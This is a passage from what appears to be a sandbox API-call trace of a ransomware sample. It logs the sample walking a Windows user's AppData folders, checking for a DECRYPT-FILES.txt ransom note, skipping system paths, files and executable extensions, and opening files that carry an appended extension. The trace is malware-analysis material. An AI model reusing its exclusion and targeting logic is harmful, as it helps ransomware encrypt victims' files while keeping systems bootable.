HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.zOBM" [0180.539] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.zOBM" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.zobm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0180.539] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=4187571) returned 1 [0180.539] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0180.539] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3930000 [0180.540] UnmapViewOfFile (lpBaseAddress=0x3930000) returned 1 [0180.541] CloseHandle (hObject=0x288) returned 1 [0180.541] CloseHandle (hObject=0x284) returned 1 [0180.541] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.541] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa647960, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.541] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.541] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa647960, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.541] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.541] CloseHandle (hObject=0x27c) returned 1 [0180.541] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.541] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.541] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.541] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.541] CloseHandle (hObject=0x274) returned 1 [0180.541] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.541] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.541] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa621800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.542] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.542] CloseHandle (hObject=0x26c) returned 1 [0180.542] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0180.542] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0180.542] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0180.542] lstrcatW (in: lpString1="Excel", lpString2="\\" | out: lpString1="Excel\\") returned="Excel\\" [0180.542] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Excel\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Program Files") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch=":\\Windows") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Games\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\All Users") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="AhnLab") returned 0x0 [0180.542] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0180.542] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.542] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\0a16c9.tmp") returned 73 [0180.542] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.543] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0180.543] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.543] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\DECRYPT-FILES.txt") returned 80 [0180.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.543] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0180.543] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0180.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.544] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.544] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c1e0470, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.544] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.544] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.544] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebbf520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.544] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.544] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.544] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.544] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.544] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.544] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned 62 [0180.544] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.544] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\" [0180.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\0a16c9.tmp" [0180.544] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.545] CloseHandle (hObject=0x0) returned 0 [0180.545] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.545] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8f5220, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.545] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.545] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xaa8f5220, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa8f5220, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0180.545] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0180.545] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0180.545] lstrcatW (in: lpString1="XLSTART", lpString2="\\" | out: lpString1="XLSTART\\") returned="XLSTART\\" [0180.545] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="XLSTART\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Program Files") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch=":\\Windows") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Games\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\All Users") returned 0x0 [0180.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="AhnLab") returned 0x0 [0180.546] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0180.546] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.546] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\0a16c9.tmp") returned 81 [0180.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0180.546] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.546] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\DECRYPT-FILES.txt") returned 88 [0180.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.546] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0180.546] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0180.546] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.547] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd01394e0, ftCreationTime.dwHighDateTime=0x1d301bc, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.547] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.547] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeebbf520, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeebbf520, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeebbf520, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.547] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.547] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.547] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.547] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.547] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.547] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned 70 [0180.547] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.547] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0180.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS 